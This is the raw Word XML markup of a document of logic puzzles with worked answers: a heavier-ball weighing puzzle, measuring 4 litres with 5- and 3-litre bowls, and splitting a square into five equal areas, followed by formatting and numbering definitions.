          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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Case 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If both are equal → heavier ball is in Group 3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>➡</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Case 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Heavier side contains the heavy ball.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D3BCFA" w14:textId="77777777" w:rsidR="00E00477" w:rsidRPr="00CE4B95" w:rsidRDefault="00E00477" w:rsidP="00E00477">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Take the heavier group → pick any 2 balls and weigh them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330561D7" w14:textId="77777777" w:rsidR="00E00477" w:rsidRPr="00CE4B95" w:rsidRDefault="00E00477" w:rsidP="00E00477">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1281"/>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equal → third is heavier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70875696" w14:textId="77777777" w:rsidR="00E00477" w:rsidRPr="00CE4B95" w:rsidRDefault="00E00477" w:rsidP="00E00477">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1281"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If not equal → heavier one is found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDCFDB8" w14:textId="419625B5" w:rsidR="00E87629" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E87629">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="480D4ED5">
          <v:rect id="_x0000_i3663" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0920F2" w14:textId="06354E70" w:rsidR="007213E8" w:rsidRPr="00CE4B95" w:rsidRDefault="007213E8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="913" w:name="_Toc196308393"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Puzzle – 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="913"/>
    </w:p>
    <w:p w14:paraId="68FBFC2F" w14:textId="7A060F49" w:rsidR="00340E57" w:rsidRPr="00CE4B95" w:rsidRDefault="00340E57" w:rsidP="001576F0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">You are doing some gardening, and need exactly 4 </w:t>
      </w:r>
      <w:r w:rsidR="007213E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>litres</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> of water to mix up some special formula for your </w:t>
      </w:r>
      <w:r w:rsidR="007213E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>award-winning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> roses.</w:t>
      </w:r>
      <w:r w:rsidR="007213E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>But you only have a 5-liter and a 3-liter bowl, but do have access to plenty of water.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8D4D99" w14:textId="4772023D" w:rsidR="00340E57" w:rsidRPr="00CE4B95" w:rsidRDefault="00340E57" w:rsidP="001576F0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">How would you measure exactly 4 </w:t>
      </w:r>
      <w:r w:rsidR="007213E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>litres</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E68DEB" w14:textId="7BE47D2B" w:rsidR="00340E57" w:rsidRPr="00CE4B95" w:rsidRDefault="00512209">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Fill the 5-liter bowl. Then fill the 3-liter bowl from the 5-liter bowl. You will now have 2 litres left in the 5 litres bowl. Empty the 3-liter bowl, and then transfer the 2 litres from the 5-liter bowl into it. Now fill the 5-liter bowl again, then pour water carefully from the 5-liter bowl into the 3-liter bowl until it is full - exactly one more </w:t>
      </w:r>
      <w:r w:rsidR="001576F0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>litre</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. The 5-liter bowl now has exactly 4 litres.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2013C47D" w14:textId="63B2C64D" w:rsidR="00E87629" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E87629">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="6F9935D3">
          <v:rect id="_x0000_i3664" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5424FEE7" w14:textId="1CE09F68" w:rsidR="00512209" w:rsidRPr="00CE4B95" w:rsidRDefault="00512209">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="914" w:name="_Toc196308394"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Puzzle – 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="914"/>
    </w:p>
    <w:p w14:paraId="0BD47E0E" w14:textId="19BD11B2" w:rsidR="00CE62DE" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE62DE" w:rsidP="00CE62DE">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Divide square in 5 equal parts?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39034EE4" w14:textId="77777777" w:rsidR="001B5DCF" w:rsidRPr="00CE4B95" w:rsidRDefault="001B5DCF" w:rsidP="001B5DCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>One small square in the center (1/5 area)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Four equal corner shapes (each 1/5 area)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF64C48" w14:textId="77777777" w:rsidR="001B5DCF" w:rsidRPr="00CE4B95" w:rsidRDefault="001B5DCF" w:rsidP="001B5DCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">This gives </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5 equal-area parts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, not necessarily identical in shape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A488D9B" w14:textId="78917856" w:rsidR="00E87629" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E87629">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="2C6D4F8C">
          <v:rect id="_x0000_i3665" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CFD22C" w14:textId="77777777" w:rsidR="00512209" w:rsidRPr="00CE4B95" w:rsidRDefault="00512209" w:rsidP="001B5DCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5726CF8D" w14:textId="08780B7C" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="006C0B8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidSect="00D91E9D">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="851" w:right="851" w:bottom="851" w:left="85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59D753B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3" o:spid="_x0000_i1025" type="#_x0000_t75" alt="https://svgsilh.com/svg/2051680.svg" style="width:1079.25pt;height:1280.25pt;visibility:visible">
            <v:imagedata r:id="rId1" o:title="" croptop="-1993f" cropbottom="-2364f" cropleft="-2332f" cropright="-4971f"/>
          </v:shape>
        </w:pict>
      </mc:Choice>
      <mc:Fallback>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50711256" wp14:editId="1CD94E94">
            <wp:extent cx="13706475" cy="16259175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="460578209" name="Graphic 3" descr="https://svgsilh.com/svg/2051680.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16836" name="Graphic 1641116836" descr="https://svgsilh.com/svg/2051680.svg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId2">
                      <a:extLst>
                        <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                          <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId3"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="13706475" cy="16259175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </mc:Fallback>
    </mc:AlternateContent>
  </w:numPicBullet>
  <w:numPicBullet w:numPicBulletId="1">
    <mc:AlternateContent>
      <mc:Choice Requires="v">
        <w:pict>
          <v:shape w14:anchorId="574CA1AB" id="Graphic 5" o:spid="_x0000_i1025" type="#_x0000_t75" alt="https://freepngimg.com/svg/image/alphabet/118020-cyrillic-letter-a.svg" style="width:351.75pt;height:339pt;visibility:visible">
            <v:imagedata r:id="rId4" o:title="" croptop="-660f" cropbottom="-591f" cropleft="-358f" cropright="-349f"/>
          </v:shape>
        </w:pict>
      </mc:Choice>
      <mc:Fallback>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57A8355E" wp14:editId="6B143A6D">
            <wp:extent cx="4467225" cy="4305300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="997275907" name="Graphic 5" descr="https://freepngimg.com/svg/image/alphabet/118020-cyrillic-letter-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101029" name="Graphic 1671101029" descr="https://freepngimg.com/svg/image/alphabet/118020-cyrillic-letter-a.svg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">
                      <a:extLst>
                        <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                          <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId6"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4467225" cy="4305300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </mc:Fallback>
    </mc:AlternateContent>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="000434CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CA85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0C68AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC329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13038E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04BC2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1964AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7542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2D64EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3E8A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2F4C87"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F42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0306A8D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C06EF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0340962"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2624AC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0350D9F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9280CA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037675D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7166B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06D123A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F880C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0735D93"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21F8B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0961863"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C568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0987C68"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C649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09D38B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0550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0A32AE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6268C8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0B72118"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96642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0D21C11"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E55A6F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0D47057"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EF068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0D63B42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A40499D2"/>
    <w:lvl w:ilvl="0" w:tplc="4009000B">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010843EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E5830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12510DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="626C5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12D5443"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B73E6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140119F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="765C4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14B4312"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79B23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15601EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3122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15842DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DBB8DA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1607888"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78B07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17750C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4B0E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17805EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8132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18A2D02"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A02C5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1BA6485"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0420A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1D02B00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF7A7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1DC017D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF480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1DE3F19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEFAA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1F1380F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE7C1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1F3080C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D424F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1F369F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03624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1F95879"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC929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01FD7A63"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4E0E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01FE27CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5308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2022C17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79343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20E7540"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E446F6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021B078B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAAAD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2203F64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="368E4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2245F4C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76868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23D0582"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2C89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2495537"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEFA0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25531FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74D0D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25813A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AAA4C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027274CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3BE6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2860BC2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7222F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2971683"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A906E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2B34C75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D0748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02BD4863"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83A6FF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02DF5DC9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84042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2E06901"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="414673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02EF2D25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49301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3267BEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0EC05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3465638"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA42BF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35576A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="159E9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37979D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7FC05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0381193A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFC4B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3947E87"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1DE1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3947FA4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F7528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03951316"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC3CA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3B03580"/>
    <w:multiLevelType w:val="multilevel"/>
